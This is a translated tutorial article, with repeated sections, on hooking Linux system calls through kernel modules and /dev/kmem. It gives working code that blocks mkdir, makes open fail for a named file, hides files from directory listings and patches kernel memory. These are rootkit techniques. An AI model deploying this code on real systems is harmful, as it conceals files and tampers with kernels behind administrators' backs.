when the work is done (when the module is unloaded), restore the original system call using the previously saved pointer.
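The four steps above can be modelled in ordinary user-space C, which is handy for getting the order of operations right before touching the kernel. This is only a sketch: call_table, real_mkdir and the other names are invented for the illustration and have nothing to do with the real sys_call_table.

```c
#include <stddef.h>

/* Hypothetical signature shared by all entries of our toy table. */
typedef int (*call_fn)(const char *path);

/* Stand-in for the real service: pretends to create a directory. */
static int real_mkdir(const char *path) { return path ? 1 : -1; }

/* Replacement handler: does nothing and reports 0. */
static int own_mkdir(const char *path) { (void)path; return 0; }

enum { NR_MKDIR = 0, NR_CALLS = 1 };

/* User-space model of a call table indexed by call number. */
static call_fn call_table[NR_CALLS] = { real_mkdir };
static call_fn orig_mkdir;

/* Steps 1 and 3: save the original pointer, then install ours. */
void hook_install(void)
{
    orig_mkdir = call_table[NR_MKDIR];
    call_table[NR_MKDIR] = own_mkdir;
}

/* Step 4: put the saved pointer back. */
void hook_remove(void)
{
    call_table[NR_MKDIR] = orig_mkdir;
}

/* Dispatch by number, the way a call table is used. */
int dispatch(int nr, const char *path)
{
    return call_table[nr](path);
}
```

Between hook_install() and hook_remove(), every dispatch(NR_MKDIR, ...) lands in own_mkdir; afterwards the original behaviour is back.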

You can use tracing to figure out which system calls are involved in a user's application. By tracing, you can determine which system call should be intercepted to take control of the application. An example of using the tracing program will be discussed below.

Now we have enough information to start examining examples of implementing modules that intercept system calls.

Examples of intercepting system calls

Preventing the creation of directories

When a directory is created, the sys_mkdir kernel function is called. Its parameter is a string containing the name of the directory being created. Consider the code that intercepts the corresponding system call.

#include <linux/module.h>
#include <asm/unistd.h>

We declare the system call table exported by the kernel:

extern void *sys_call_table[];

Let's define a pointer to store the original system call:

int (*orig_mkdir)(const char *path);

Let's create our own system call. Our call does nothing, it just returns zero:

int own_mkdir(const char *path)
{
    return 0;
}

During module initialization, we save the pointer to the original call and replace the system call:

int init_module()
{
    orig_mkdir = sys_call_table[__NR_mkdir];
    sys_call_table[__NR_mkdir] = own_mkdir;
    return 0;
}

When unloading, we restore the original call:

void cleanup_module()
{
    sys_call_table[__NR_mkdir] = orig_mkdir;
}

Save the code in the sys_mkdir_call.c file. To build the object module, let's create a Makefile with the following content:

CC = gcc

CFLAGS = -O3 -Wall -fomit-frame-pointer

MODFLAGS = -D__KERNEL__ -DMODULE -I/usr/src/linux/include

sys_mkdir_call.o: sys_mkdir_call.c
	$(CC) -c $(CFLAGS) $(MODFLAGS) sys_mkdir_call.c

Use the make command to build the kernel module. After loading it, let's try to create a directory with the mkdir command. As you can see, nothing happens: the command does not work. To make it work again, it is enough to unload the module.

Prevent reading the file

In order to read a file, you must first open it with the open function. As you might guess, this function corresponds to the sys_open system call. By intercepting it, we can protect a file from being read. Let's consider the implementation of the interceptor module.

#include <linux/module.h>
#include <linux/slab.h>
#include <linux/string.h>
#include <asm/uaccess.h>
#include <asm/unistd.h>

extern void *sys_call_table[];

Pointer to keep the original system call:

int (*orig_open)(const char *pathname, int flag, int mode);

The first parameter of the open function is the name of the file to open. The new system call should compare this parameter with the name of the file we want to protect. If the names match, a file opening error is simulated. Our new system call looks like this:

int own_open(const char *pathname, int flag, int mode)
{

The name of the file being opened goes here:

    char *kernel_path;

The name of the file we want to protect:

    char hide[] = "test.txt";

Let's allocate memory and copy the name of the file being opened there, making sure the copy is NUL-terminated:

    kernel_path = (char *)kmalloc(255, GFP_KERNEL);
    copy_from_user(kernel_path, pathname, 255);
    kernel_path[254] = '\0';

Compare:

    if (strstr(kernel_path, hide) != NULL) {

Free the memory and return an error code if the names match:

        kfree(kernel_path);
        return -ENOENT;
    } else {

If the names do not match, we call the original system call to perform the standard file open procedure:

        kfree(kernel_path);
        return orig_open(pathname, flag, mode);
    }
}

int init_module()
{
    orig_open = sys_call_table[__NR_open];
    sys_call_table[__NR_open] = own_open;
    return 0;
}

void cleanup_module()
{
    sys_call_table[__NR_open] = orig_open;
}

Let's save the code in the sys_open_call.c file and create a Makefile to build the object module:

CC = gcc

CFLAGS = -O2 -Wall -fomit-frame-pointer

MODFLAGS = -D__KERNEL__ -DMODULE -I/usr/src/linux/include

sys_open_call.o: sys_open_call.c
	$(CC) -c $(CFLAGS) $(MODFLAGS) sys_open_call.c

In the current directory, create a file named test.txt, load the module and enter the cat test.txt command. The system will report that there is no file with this name.

Honestly, this kind of protection is easy to get around. It is enough to rename the file with the mv command and then read its contents.
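It is worth seeing how the name comparison itself behaves, since a substring test catches more paths than just the protected file. The sketch below runs in user space; both helper names are hypothetical, and the stricter basename variant is my own illustration, not something the module does.

```c
#include <string.h>

/* Hypothetical helper mirroring the module's test: substring match on the path. */
int matches_by_substring(const char *path, const char *hide)
{
    return strstr(path, hide) != NULL;
}

/* Hypothetical stricter variant: compare only the final path component. */
int matches_by_basename(const char *path, const char *hide)
{
    const char *slash = strrchr(path, '/');
    const char *base = slash ? slash + 1 : path;
    return strcmp(base, hide) == 0;
}
```

With hide set to "test.txt", the substring test also fires for a path such as /tmp/mytest.txt.bak, while the basename test does not. Neither of them helps once the file has been renamed.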

Hiding a file entry in a directory

Let's determine which system call is responsible for reading the contents of a directory. To do this, let's write another test fragment that reads the current directory:

/* dir.c file */

#include <dirent.h>

int main()
{
    DIR *d;
    struct dirent *dp;

    d = opendir(".");
    dp = readdir(d);

    return 0;
}

Let's build the executable:

gcc -o dir dir.c

and trace it:

strace ./dir

Let's pay attention to the penultimate line:

getdents(6, /* 4 entries */, 3933) = 72

The contents of the directory are read by the getdents function. The result is stored as a list of structures of type struct dirent. The second parameter of this function is a pointer to this list. The function returns the total length of all entries in the directory. In our example, getdents found four entries in the current directory: ".", ".." and our two files, the executable and the source code. Together the directory entries are 72 bytes long. Information about each entry is stored, as we said, in a struct dirent structure. We are interested in two fields of this structure:

d_reclen - the size of the record;
d_name - the file name.

In order to hide a file entry (in other words, make it invisible), you need to intercept the sys_getdents system call, find the corresponding record in the list of structures it returns, and delete it. Consider the code that performs this operation (the author of the original code is Michal Zalewski):

extern void *sys_call_table[];

int (*orig_getdents)(u_int, struct dirent *, u_int);

Let's define our system call.

int own_getdents(u_int fd, struct dirent *dirp, u_int count)
{
    int tmp, t;
    unsigned int n;

The purpose of these variables will become clear below. We also need two structure pointers:

    struct dirent *dirp2, *dirp3;

The name of the file we want to hide:

    char hide[] = "our.file";

Let's determine the total length of the entries in the directory:

    tmp = (*orig_getdents)(fd, dirp, count);

    if (tmp > 0) {

Allocate memory in kernel space and copy the contents of the directory into it:

        dirp2 = (struct dirent *)kmalloc(tmp, GFP_KERNEL);
        copy_from_user(dirp2, dirp, tmp);

Use the second pointer to walk the list, and store the total length of the entries:

        dirp3 = dirp2;
        t = tmp;

Let's start looking for our file:

        while (t > 0) {

Read the length of the current record and work out the remaining length of the records in the directory:

            n = dirp3->d_reclen;
            t -= n;

Check whether the file name in the current record matches the one we are looking for:

            if (strstr((char *)&(dirp3->d_name), hide) != NULL) {

If so, overwrite the record with the ones that follow it (the regions overlap, hence memmove) and calculate the new total length. The pointer stays where it is, because the next record now occupies this position:

                memmove(dirp3, (char *)dirp3 + n, t);
                tmp -= n;
            } else {

Otherwise we move the pointer to the next record and continue searching:

                dirp3 = (struct dirent *)((char *)dirp3 + n);
            }
        }

Copy the result back to user space and free the memory:

        copy_to_user(dirp, dirp2, tmp);
        kfree(dirp2);
    }

Return the length of the entries in the directory:

    return tmp;
}

The module initialization and unloading functions have the standard form:

int init_module(void)
{
    orig_getdents = sys_call_table[__NR_getdents];
    sys_call_table[__NR_getdents] = own_getdents;
    return 0;
}

void cleanup_module()
{
    sys_call_table[__NR_getdents] = orig_getdents;
}

Let's save the source in the sys_call_getd.c file and create a Makefile with the following content:

CC = gcc

module = sys_call_getd.o

CFLAGS = -O3 -Wall

LINUX = /usr/src/linux

MODFLAGS = -D__KERNEL__ -DMODULE -I$(LINUX)/include

sys_call_getd.o: sys_call_getd.c
	$(CC) -c $(CFLAGS) $(MODFLAGS) sys_call_getd.c

Create our.file in the current directory and load the module. The file disappears, as required.
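The record-removal step is easy to get subtly wrong, so it may help to try it on a plain buffer in user space first. The sketch below uses a simplified, made-up record layout (struct rec, fixed 32-byte records) rather than the real struct dirent. What it is meant to show is the walk by d_reclen, the use of memmove for the overlapping shift, and the fact that the position is not advanced after a removal.

```c
#include <stddef.h>
#include <string.h>

/* Simplified, hypothetical record layout: length first, then the name. */
struct rec {
    unsigned short d_reclen;   /* size of this record in bytes */
    char d_name[30];           /* NUL-terminated file name */
};

/* Append one record to buf at offset off; returns the new offset. */
size_t rec_append(char *buf, size_t off, const char *name)
{
    struct rec r;
    memset(&r, 0, sizeof r);
    r.d_reclen = sizeof r;
    strncpy(r.d_name, name, sizeof r.d_name - 1);
    memcpy(buf + off, &r, sizeof r);
    return off + sizeof r;
}

/* Remove every record whose name contains hide; returns the new total length. */
size_t rec_hide(char *buf, size_t len, const char *hide)
{
    size_t off = 0;
    while (off < len) {
        struct rec r;
        memcpy(&r, buf + off, sizeof r);
        if (strstr(r.d_name, hide) != NULL) {
            /* Shift the tail down over this record; the regions overlap. */
            memmove(buf + off, buf + off + r.d_reclen, len - off - r.d_reclen);
            len -= r.d_reclen;
            /* Do not advance: the next record now sits at off. */
        } else {
            off += r.d_reclen;
        }
    }
    return len;
}

/* Copy the name of the record at offset off into out (at least 30 bytes). */
void rec_name(const char *buf, size_t off, char *out)
{
    struct rec r;
    memcpy(&r, buf + off, sizeof r);
    strcpy(out, r.d_name);
}
```

Filling a buffer with "dir.c", "our.file" and "dir" and then calling rec_hide(buf, len, "our.file") leaves two records, with "dir" moved up into the second slot.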

As you understand, it is not possible to consider an example of intercepting each system call within the framework of one article. Therefore, for those who are interested in this issue, I recommend visiting the sites:

There you can find more complex and interesting examples of intercepting system calls. Write about all your comments and suggestions on the magazine's forum.

In preparing the article, materials from the site were used

This material is a modification of the article of the same name by Vladimir Meshkov, published in the journal "System Administrator"

This material is a copy of Vladimir Meshkov's articles from the "System Administrator" magazine. These articles can be found at the links below. Some examples of source codes of programs have also been changed - improved, refined. (Example 4.2 was heavily modified, since I had to intercept a slightly different system call) URLs: http://www.samag.ru/img/uploaded/p.pdf http://www.samag.ru/img/uploaded/a3. pdf



1. General view of Linux architecture

The most general view reveals a two-tier model of the system.

kernel <=> progs

In the center (on the left) is the kernel of the system. The kernel interacts directly with the computer's hardware, isolating application programs from the details of the architecture. The kernel offers a set of services to application programs. Kernel services include input/output operations (opening, reading, writing and managing files), the creation and management of processes, their synchronization and interprocess communication. All applications request kernel services through system calls.

The second level is made up of applications or tasks, both system ones, which determine the functionality of the system, and applications, which provide the Linux user interface. However, despite the external heterogeneity of applications, the schemes of interaction with the kernel are the same.

Interaction with the kernel takes place through the standard system call interface. The syscall interface is a collection of kernel services and defines the format of service requests. A process requests a service through a system call to a specific kernel procedure, similar in appearance to a normal library function call. The kernel, on behalf of the process, executes the request and returns the necessary data to the process.

In the following example, the program opens a file, reads data from it, and closes the file. The operations of opening (open), reading (read) and closing (close) the file are performed by the kernel at the request of the task, and the functions open(2), read(2) and close(2) are system calls.

/* Source 1.0 */
#include <fcntl.h>
#include <unistd.h>

int main()
{
    int fd;
    char buf[80];

    /* Open the file - get the file descriptor fd */
    fd = open("file1", O_RDONLY);

    /* Read 80 characters into the buf buffer */
    read(fd, buf, sizeof(buf));

    /* Close the file */
    close(fd);

    return 0;
}
/* EOF */

A complete list of Linux system calls can be found in the /usr/include/asm/unistd.h file. Let's now look at the mechanism for making system calls using this example. The compiler, on meeting the open() function, converts it into assembly code that loads the system call number for this function and its parameters into the processor registers and then raises interrupt 0x80. The following values are loaded into the processor registers:

into the EAX register - the system call number. In our case, the system call number is 5 (see __NR_open).
into the EBX register - the first parameter of the function (for open() it is a pointer to a string containing the name of the file being opened).
into the ECX register - the second parameter (the open flags, here O_RDONLY).

The third parameter (the permissions of a newly created file) goes into the EDX register; in this case we do not have one. To execute a system call, Linux uses the system_call function, which is defined (depending on the architecture, in this case i386) in the /usr/src/linux/arch/i386/kernel/entry.S file. This function is the entry point for all system calls. The kernel responds to interrupt 0x80 by calling system_call, which is, in effect, the handler for interrupt 0x80.

To make sure we're on the right track, let's look at the open () function code in the system libc:

# gdb -q /lib/libc.so.6
(gdb) disas open
Dump of assembler code for function open:
0x000c8080: call 0x1082be <__i686.get_pc_thunk.cx>
0x000c8085: add $0x6423b,%ecx
0x000c808b: cmpl $0x0,0x1a84(%ecx)
0x000c8092: jne 0xc80b1
0x000c8094: push %ebx
0x000c8095: mov 0x10(%esp,1),%edx
0x000c8099: mov 0xc(%esp,1),%ecx
0x000c809d: mov 0x8(%esp,1),%ebx
0x000c80a1: mov $0x5,%eax
0x000c80a6: int $0x80
...

As the last lines show, the parameters are loaded into the EDX, ECX and EBX registers, and the system call number, 5 as we already know, is placed in EAX last.

Now let's get back to the system call mechanism. So, the kernel calls the handler for interrupt 0x80, the system_call function. system_call puts copies of the registers holding the call parameters on the stack using the SAVE_ALL macro and invokes the required system function with a call instruction. The table of pointers to the kernel functions that implement system calls lives in the sys_call_table array (see the file arch/i386/kernel/entry.S). The system call number held in the EAX register is an index into this array. Thus, if EAX is 5, the sys_open() kernel function will be called. Why is the SAVE_ALL macro needed? The explanation is simple. Since almost all kernel system functions are written in C, they look for their parameters on the stack, and it is SAVE_ALL that puts the parameters there. The value returned by the system call is stored in the EAX register.

Now let's figure out how to intercept the system call. The mechanism of loadable kernel modules will help us with this.

2. Loadable kernel module

A Loadable Kernel Module (commonly abbreviated as LKM) is program code that runs in kernel space. The main feature of an LKM is that it can be loaded and unloaded dynamically, without rebooting the system or recompiling the kernel.

Each LKM consists of at least two main functions:

the module initialization function, called when the LKM is loaded into memory: int init_module(void) { ... }
the module unload function: void cleanup_module(void) { ... }

Here is an example of the simplest module:

/* Source 2.0 */
#include <linux/module.h>

int init_module(void)
{
    printk("Hello World\n");
    return 0;
}

void cleanup_module(void)
{
    printk("Bye\n");
}
/* EOF */

Compile and load the module. The module is loaded into memory with the insmod command, and the loaded modules are listed with the lsmod command:

# gcc -c -DMODULE -I/usr/src/linux/include/ src-2.0.c
# insmod src-2.0.o
Warning: loading src-2.0.o will taint the kernel: no license
Module src-2.0 loaded, with warnings
# dmesg | tail -n 1
Hello World
# lsmod | grep src
src-2.0 336 0 (unused)
# rmmod src-2.0
# dmesg | tail -n 1
Bye

3. Algorithm for intercepting a system call based on LKM

To implement a module that intercepts a system call, it is necessary to define an interception algorithm. The algorithm is as follows:

save a pointer to the original call so that it can be restored
create a function that implements the new system call
replace the call in the sys_call_table system call table, i.e. point the corresponding entry at the new system call
when the work is done (when the module is unloaded), restore the original system call using the previously saved pointer

Tracing lets you find out which system calls a user application makes. By tracing it, you can determine which system call should be intercepted to take control of the application.

# ltrace -S ./src-1.0
...
open("file1", 0, 01
SYS_open("file1", 0, 01) = 3
<... open resumed>) = 3
read(3,
SYS_read(3, "123\n", 80) = 4
<... read resumed> "123\n", 80) = 4
close(3
SYS_close(3) = 0
<... close resumed>) = 0
...

Now we have enough information to start studying examples of modules that intercept system calls.

4. Examples of intercepting system calls based on LKM

4.1 Preventing the creation of directories

When a directory is created, the sys_mkdir kernel function is called. Its parameter is a string containing the name of the directory being created. Consider the code that intercepts the corresponding system call.

/* Source 4.1 */
#include <linux/module.h>
#include <linux/kernel.h>
#include <asm/unistd.h>

/* Declare the system call table exported by the kernel */
extern void *sys_call_table[];

/* Define a pointer to save the original call */
int (*orig_mkdir)(const char *path);

/* Let's create our own system call. Our call does nothing, it just returns zero */
int own_mkdir(const char *path)
{
    return 0;
}

/* During module initialization, we save the pointer to the original call and replace the system call */
int init_module(void)
{
    orig_mkdir = sys_call_table[__NR_mkdir];
    sys_call_table[__NR_mkdir] = own_mkdir;
    printk("sys_mkdir replaced\n");
    return 0;
}

/* When unloading, restore the original call */
void cleanup_module(void)
{
    sys_call_table[__NR_mkdir] = orig_mkdir;
    printk("sys_mkdir moved back\n");
}
/* EOF */

To get the object module, run the following command, then perform some experiments on the system:

# gcc -c -DMODULE -I/usr/src/linux/include/ src-3.1.c
# dmesg | tail -n 1
sys_mkdir replaced
# mkdir test
# ls -ald test
ls: test: No such file or directory
# rmmod src-3.1
# dmesg | tail -n 1
sys_mkdir moved back
# mkdir test
# ls -ald test
drwxr-xr-x 2 root root 4096 2003-12-23 03:46 test

As you can see, the "mkdir" command does not work, or rather, nothing happens. To restore the system's normal behaviour, it is enough to unload the module, which is what was done above.

4.2 Hiding a file entry in a directory

Let's determine which system call is responsible for reading the contents of a directory. To do this, we will write another test fragment that reads the current directory:

/* Source 4.2.1 */
#include <sys/types.h>
#include <dirent.h>

int main()
{
    DIR *d;
    struct dirent *dp;

    d = opendir(".");
    dp = readdir(d);

    return 0;
}
/* EOF */

Build the executable and trace it:

# gcc -o src-3.2.1 src-3.2.1.c
# ltrace -S ./src-3.2.1
...
opendir("."
SYS_open(".", 100352, 010005141300) = 3
SYS_fstat64(3, 0xbffff79c, 0x4014c2c0, 3, 0xbffff874) = 0
SYS_fcntl64(3, 2, 1, 1, 0x4014c2c0) = 0
SYS_brk(NULL) = 0x0806a5f4
SYS_brk(0x0806b000) = 0x0806b000
<... opendir resumed>) = 0x08049648
readdir(0x08049648
SYS_getdents64(3, 0x08049678, 4096, 0x40014400, 0x4014c2c0) = 528
<... readdir resumed>) = 0x08049678
...

Pay attention to the SYS_getdents64 line. The contents of the directory are read by the getdents64 function (on other kernels it may be getdents). The result is stored as a list of structures of type struct dirent, and the function itself returns the total length of all entries in the directory. We are interested in two fields of this structure:

d_reclen - record size
d_name - file name

In order to hide a file entry (in other words, make it invisible), it is necessary to intercept the sys_getdents64 system call, find the corresponding record in the list of structures it returns and delete it. Consider the code that performs this operation (the author of the original code is Michal Zalewski):

/* Source 4.2.2 */
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/types.h>
#include <linux/dirent.h>
#include <linux/slab.h>
#include <linux/string.h>
#include <asm/uaccess.h>
#include <asm/unistd.h>

extern void *sys_call_table[];

int (*orig_getdents)(u_int fd, struct dirent *dirp, u_int count);

/* Define our own system call */
int own_getdents(u_int fd, struct dirent *dirp, u_int count)
{
    int tmp, t;
    unsigned int n;
    struct dirent64 {
        int d_ino1, d_ino2;
        int d_off1, d_off2;
        unsigned short d_reclen;
        unsigned char d_type;
        char d_name[256];
    } *dirp2, *dirp3;

    /* The name of the file we want to hide */
    char hide[] = "file1";

    /* Determine the total length of the entries in the directory */
    tmp = (*orig_getdents)(fd, dirp, count);

    if (tmp > 0) {
        /* Allocate memory in kernel space and copy the directory contents into it */
        dirp2 = (struct dirent64 *)kmalloc(tmp, GFP_KERNEL);
        copy_from_user(dirp2, dirp, tmp);

        /* Use the second pointer to walk the list and save the total length */
        dirp3 = dirp2;
        t = tmp;

        /* Let's start looking for our file */
        while (t > 0) {
            /* Read the length of the current record and work out the remaining length */
            n = dirp3->d_reclen;
            t -= n;

            /* Check whether the file name in the current record matches the one we want */
            if (strstr((char *)&(dirp3->d_name), hide) != NULL) {
                /* If so, overwrite the record (overlapping regions, hence memmove)
                   and calculate the new total length; the next record is now here */
                memmove(dirp3, (char *)dirp3 + n, t);
                tmp -= n;
            } else {
                /* Otherwise move the pointer to the next record and continue */
                dirp3 = (struct dirent64 *)((char *)dirp3 + n);
            }
        }

        /* Copy the result back to user space and free the memory */
        copy_to_user(dirp, dirp2, tmp);
        kfree(dirp2);
    }

    /* Return the length of the entries in the directory */
    return tmp;
}

/* The module initialization and unloading functions have the standard form */
int init_module(void)
{
    orig_getdents = sys_call_table[__NR_getdents64];
    sys_call_table[__NR_getdents64] = own_getdents;
    return 0;
}

void cleanup_module()
{
    sys_call_table[__NR_getdents64] = orig_getdents;
}
/* EOF */

Compile and load this code and notice how "file1" disappears, as required.

5. Direct access to the kernel address space via /dev/kmem

Let us first consider in theory how interception works with direct access to the kernel address space, and then move on to a practical implementation.

Direct access to the kernel address space is provided by the device file /dev/kmem. This file maps the entire available virtual address space, including the swap area. The kmem file is handled with the standard system functions open(), read() and write(). Having opened /dev/kmem in the usual way, we can refer to any address in the system by specifying it as an offset in this file. This method was developed by Silvio Cesare.

System functions are accessed by loading function parameters into processor registers and then calling software interrupt 0x80. The interrupt handler, the system_call function, pushes the call parameters onto the stack, retrieves the address of the called system function from the sys_call_table, and transfers control to this address.

With full access to the kernel address space, we can obtain the entire contents of the system call table, i.e. the addresses of all system functions. By changing the address of any system call, we thereby intercept it. But for this we need to know the address of the table or, in other words, the offset in the /dev/kmem file at which the table is located.

To determine the address of the sys_call_table, you must first calculate the address of the system_call function. Since this function is an interrupt handler, let's look at how interrupts are handled in protected mode.

In real mode, when an interrupt occurs the processor consults the interrupt vector table, which always sits at the very beginning of memory and contains the two-word (segment:offset) addresses of the interrupt handlers. In protected mode, the counterpart of the interrupt vector table is the Interrupt Descriptor Table (IDT), which the operating system sets up in memory. For the processor to be able to use this table, its address must be loaded into the IDTR (Interrupt Descriptor Table Register). The IDT contains descriptors of the interrupt handlers, which include, among other things, their addresses. These descriptors are called gates. Having registered an interrupt, the processor uses its number to fetch the gate from the IDT, determines the address of the handler and transfers control to it.

To find the address of the system_call function, we need to extract the gate for interrupt int $0x80 from the IDT, and from the gate the address of the corresponding handler, i.e. the address of system_call. Inside system_call, the sys_call_table is accessed with the instruction call *<table_address>(,%eax,4). Having found the opcode (signature) of this instruction in the /dev/kmem file, we also find the address of the system call table.
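Extracting the handler address from a gate comes down to gluing two 16-bit halves together. Here is a minimal sketch for the 8-byte i386 gate format, in which the low half of the offset occupies bytes 0-1 and the high half bytes 6-7. The function names are my own, and the sketch works on a byte array that you are assumed to have read from the IDT already.

```c
#include <stdint.h>

/* Rebuild the 32-bit handler address from an 8-byte i386 gate descriptor:
 * bytes 0-1 hold offset bits 0..15, bytes 6-7 hold offset bits 16..31. */
uint32_t gate_offset(const unsigned char gate[8])
{
    uint32_t low  = (uint32_t)gate[0] | ((uint32_t)gate[1] << 8);
    uint32_t high = (uint32_t)gate[6] | ((uint32_t)gate[7] << 8);
    return (high << 16) | low;
}

/* Address of the descriptor for a given vector: each gate is 8 bytes long. */
uint32_t gate_position(uint32_t idt_base, unsigned vector)
{
    return idt_base + vector * 8u;
}
```

For vector 0x80 the gate sits 0x400 bytes past the base of the IDT; feeding its 8 bytes to gate_offset() yields the address of system_call.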

To determine the opcode, we will use the debugger and disassemble the system_call function:

    # gdb -q /usr/src/linux/vmlinux
    (gdb) disas system_call
    Dump of assembler code for function system_call:
    0xc0194cbc:  push   %eax
    0xc0194cbd:  cld
    0xc0194cbe:  push   %es
    0xc0194cbf:  push   %ds
    0xc0194cc0:  push   %eax
    0xc0194cc1:  push   %ebp
    0xc0194cc2:  push   %edi
    0xc0194cc3:  push   %esi
    0xc0194cc4:  push   %edx
    0xc0194cc5:  push   %ecx
    0xc0194cc6:  push   %ebx
    0xc0194cc7:  mov    $0x18,%edx
    0xc0194ccc:  mov    %edx,%ds
    0xc0194cce:  mov    %edx,%es
    0xc0194cd0:  mov    $0xffffe000,%ebx
    0xc0194cd5:  and    %esp,%ebx
    0xc0194cd7:  testb  $0x2,0x18(%ebx)
    0xc0194cdb:  jne    0xc0194d3c
    0xc0194cdd:  cmp    $0x10e,%eax
    0xc0194ce2:  jae    0xc0194d69
    0xc0194ce8:  call   *0xc02cbb0c(,%eax,4)
    0xc0194cef:  mov    %eax,0x18(%esp,1)
    0xc0194cf3:  nop
    End of assembler dump.

The line "call *0xc02cbb0c(,%eax,4)" is the access to the sys_call_table. The value 0xc02cbb0c is the address of the table (your numbers will most likely be different). Let's get the opcode of this instruction:

    (gdb) x/xw system_call+44
    0xc0194ce8:  0x0c8514ff

We have found the opcode of the instruction that accesses sys_call_table. It is \xff\x14\x85. The next 4 bytes are the address of the table. You can verify this by entering the command:

    (gdb) x/xw system_call+44+3
    0xc0194ceb:  0xc02cbb0c

Thus, by finding the sequence \xff\x14\x85 in the /dev/kmem file and reading the 4 bytes that follow it, we get the address of the sys_call_table system call table. Knowing its address, we can read the contents of the table (the addresses of all system functions) and intercept any system call by changing its address.
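The signature search can be sketched in a few lines. The function below, whose name find_table_addr is an assumption of this example, scans a buffer holding the first bytes of system_call for \xff\x14\x85 and assembles the four bytes that follow as a little-endian address. It works on an in-memory copy; reading the bytes from /dev/kmem is left out.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/*
 * Scan `len` bytes of code for the 3-byte signature ff 14 85 and return
 * the 32-bit little-endian operand that follows it, or 0 if the signature
 * (plus its 4 operand bytes) does not occur in the buffer.
 */
static uint32_t find_table_addr(const unsigned char *code, size_t len)
{
    static const unsigned char sig[3] = { 0xff, 0x14, 0x85 };
    size_t i;

    for (i = 0; i + sizeof(sig) + 4 <= len; i++) {
        if (memcmp(code + i, sig, sizeof(sig)) == 0) {
            const unsigned char *p = code + i + sizeof(sig);
            return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
                   ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
        }
    }
    return 0;
}
```

Checking the bounds before reading the operand matters: a match in the last few bytes of the buffer would otherwise read past its end.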

Consider the pseudocode that performs the interception operation:

    readaddr(old_syscall, sct + SYS_CALL * 4, 4);
    writeaddr(new_syscall, sct + SYS_CALL * 4, 4);

The readaddr function reads the address of the system call from the system call table and stores it in the old_syscall variable. Each entry in sys_call_table is 4 bytes long. The desired address is located at offset sct + SYS_CALL * 4 in the /dev/kmem file (here sct is the address of the sys_call_table and SYS_CALL is the number of the system call). The writeaddr function overwrites the address of the SYS_CALL system call with the address of the new_syscall function, so that all calls to SYS_CALL are serviced by this function.
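A minimal sketch of the readaddr/writeaddr pair in C might look as follows. It assumes fd is any seekable file descriptor (on a 2.4 system this would be /dev/kmem opened read-write, but an ordinary file works for experiments) and that entries are 4 bytes wide, as on 32-bit x86. The names read_entry, write_entry and hook_entry are hypothetical.

```c
#include <stdint.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Read the 4-byte entry number `nr` of a table that starts at offset `sct`. */
static int read_entry(int fd, off_t sct, unsigned nr, uint32_t *out)
{
    off_t pos = sct + (off_t)nr * 4;

    if (lseek(fd, pos, SEEK_SET) != pos)
        return -1;
    return read(fd, out, sizeof(*out)) == (ssize_t)sizeof(*out) ? 0 : -1;
}

/* Overwrite entry number `nr` with `value`. */
static int write_entry(int fd, off_t sct, unsigned nr, uint32_t value)
{
    off_t pos = sct + (off_t)nr * 4;

    if (lseek(fd, pos, SEEK_SET) != pos)
        return -1;
    return write(fd, &value, sizeof(value)) == (ssize_t)sizeof(value) ? 0 : -1;
}

/* Install a new address and hand back the old one so it can be restored. */
static int hook_entry(int fd, off_t sct, unsigned nr,
                      uint32_t new_addr, uint32_t *old_addr)
{
    if (read_entry(fd, sct, nr, old_addr) != 0) {
        perror("read_entry");
        return -1;
    }
    return write_entry(fd, sct, nr, new_addr);
}
```

Returning the old address from hook_entry keeps the original handler available, both for restoring the table and for calling through to the real system call.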

It seems that everything is simple and the goal has been achieved. However, let's remember that we are working in the user's address space. If we place a new system function in this address space, then when we call this function we will get a nice error message. Hence the conclusion - a new system call must be placed in the kernel address space. To do this, you need to: get a block of memory in kernel space, place a new system call in this block.

You can allocate memory in kernel space using the kmalloc function. But you cannot call a kernel function directly from the user's address space, so we will use the following algorithm:

knowing the address of sys_call_table, get the address of some system call (for example, sys_mkdir)
define a function that calls kmalloc and returns a pointer to a block of memory in the kernel address space; let's call this function get_kmalloc
save the first N bytes of the sys_mkdir system call, where N is the size of the get_kmalloc function
overwrite the first N bytes of sys_mkdir with the get_kmalloc function
invoke the sys_mkdir system call, thereby executing the get_kmalloc function
restore the first N bytes of the sys_mkdir system call

As a result, we have at our disposal a block of memory located in kernel space.
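The save, overwrite and restore steps of this algorithm can be tried out safely on an ordinary byte buffer. The sketch below is only a user-space model: target stands in for the first bytes of sys_mkdir and payload for the code of get_kmalloc, and the names patch, patch_apply, patch_restore and MAX_PATCH are assumptions of this example.

```c
#include <stddef.h>
#include <string.h>

#define MAX_PATCH 64   /* illustrative upper bound on N */

/* Remembers the bytes that were overwritten so they can be put back. */
struct patch {
    unsigned char saved[MAX_PATCH];
    size_t len;
};

/* Save the first `len` bytes of `target`, then overwrite them with `payload`. */
static int patch_apply(unsigned char *target, const unsigned char *payload,
                       size_t len, struct patch *p)
{
    if (len > MAX_PATCH)
        return -1;               /* the save buffer must hold all N bytes */
    memcpy(p->saved, target, len);
    p->len = len;
    memcpy(target, payload, len);
    return 0;
}

/* Put the original bytes back. */
static void patch_restore(unsigned char *target, const struct patch *p)
{
    memcpy(target, p->saved, p->len);
}
```

The size check is the important detail: the buffer that holds the saved bytes has to be at least N bytes long, otherwise the restore step writes back garbage.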

But to implement this algorithm we need the address of the kmalloc function. There are several ways to find it. The easiest is to read the address from the System.map file or to determine it with the gdb debugger (print &kmalloc). If module support is enabled in the kernel, the kmalloc address can be obtained with the get_kernel_syms() function; this option is discussed below. If there is no module support, the address of kmalloc has to be found by searching for the opcode of the instructions that call kmalloc, much as was done for sys_call_table.
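For the System.map route, a small lookup helper is enough. System.map lists one symbol per line as a hexadecimal address, a type letter and a name; the sketch below reads such lines from an already opened stream. The function name lookup_symbol is hypothetical, and opening the right System.map for the running kernel is left to the caller.

```c
#include <stdio.h>
#include <string.h>

/*
 * Look up `name` in a System.map-style stream ("address type symbol" on
 * each line). Returns the symbol's address, or 0 if it is not listed.
 */
static unsigned long lookup_symbol(FILE *map, const char *name)
{
    char line[256], sym[128], type;
    unsigned long addr;

    while (fgets(line, sizeof(line), map)) {
        if (sscanf(line, "%lx %c %127s", &addr, &type, sym) == 3 &&
            strcmp(sym, name) == 0)
            return addr;
    }
    return 0;
}
```

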